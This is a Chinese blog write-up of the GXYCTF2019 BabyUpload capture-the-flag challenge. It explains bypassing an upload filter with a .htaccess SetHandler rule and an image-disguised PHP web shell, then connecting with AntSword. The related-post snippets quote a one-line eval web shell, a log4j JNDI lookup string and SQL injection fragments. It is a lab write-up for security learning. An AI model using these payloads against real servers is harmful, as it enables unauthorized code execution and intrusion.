BUU-WEB-[GXYCTF2019]BabyUpload

最新推荐文章于 2022-11-21 17:10:44 发布
最新推荐文章于 2022-11-21 17:10:44 发布
阅读量253 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116852503
版权

[GXYCTF2019]BabyUpload

尝试直接上传一句话木马。
在这里插入图片描述
(根据测试,只能提交图片格式的文件)
想到之前做的一道利用.htaccess的配置文件,将图片转换成php的文件上传题目。
尝试一下。
.htaccess内容为:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述

图片木马很神奇啊,图片只能以png格式,但是抓包时还得修改成jpeg格式,否则过不了。在这里插入图片描述
上传成功后,就可以使用蚁剑连接了。
在这里插入图片描述
flag在根目录下。
在这里插入图片描述

TzZzEZ-web
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
[GXYCTF2019] web题-BabyUpload
BROTHERYY的博客
08-18 335
复现环境:buuoj.cn 上传题 直接上传png和.htaccess cd连接 flag{196e03ad-872b-44a3-9b8d-2526c9c49af2}
BUUCTF WEB BabyUpload1
qq_41696858的博客
10-31 2741
最简单的一个文件上传,理论上只支持文件内容极少的jpeg和jpg,是的,你没有听错,内容极少 所以不要尝试去尝试上传一个jpg图片检测文件后缀,因为网上download下来的图片绝大多数内容超过限制 ok,那么经过检测,.htaccess没有被过滤 那么上传一个.htaccess文件,内容为 SetHandler application/x-httpd-php 表示凡是.htaccess文件夹所在目录的文件都由php进行处理 然后上传一句话,<script language=php>$_POST
web buuctf [GXYCTF2019]BabyUpload1
weixin_44214568的博客
03-22 809
考点:.htaccess文件, 抓包修改content-type 文件上传漏洞 1.如题: 传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下: GIF89a?<script language="php">@eval($_POST[dd]);</script> 2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htacces
buuctf-web-BabyUpload-个人思路
sunquan705的博客
11-21 272
buuctf-web-BabyUpload-个人思路-有误的地方还请各位师傅谅解
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [GXYCTF2019]BabyUpload
易编橙 · 终身成长社群,相遇已是上上签!
09-03 1296
思考:在实际应用场景,常规类的文件上传、CMS类的文件上传、编辑器的上传或者CTF比赛的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1889
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
[GXYCTF2019]BabyUpload 1
qq_43618536的博客
07-03 457
BUUCTF的[GXYCTF2019]BabyUpload 1
CTF赛题:将txt文件提取换为图片(二维码)
10-20
提取txt文档的大量0和1,生成二维码
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其明文... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7365
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码,提供了一个github地址。
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4333
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3248
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2936
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[长安杯]web-shiro复现
qq_24033605的博客
01-12 2220
长安杯-shiro?复现 浏览器显示是springboot框架 登录伪造shiro,关键词为remeber-me shiro直接打,打不进去 springboot还可以写log4j漏洞,测试一下 jndi被过滤了 进行绕过 ${${::-j}ndi:rmi://py2hu7.ceye.io/exp} 成功接收到dnslog信息。 构建jndi反弹shell,这里反弹shell的命令需要bypass一下 在这里插入代码片 反弹的有点慢,但是可以成功反弹shell并拿取flag。 ...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件的MIME编码。它的作用是将非ASCII字符换为可打印的ASCII字符。在Quoted-printable编码,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值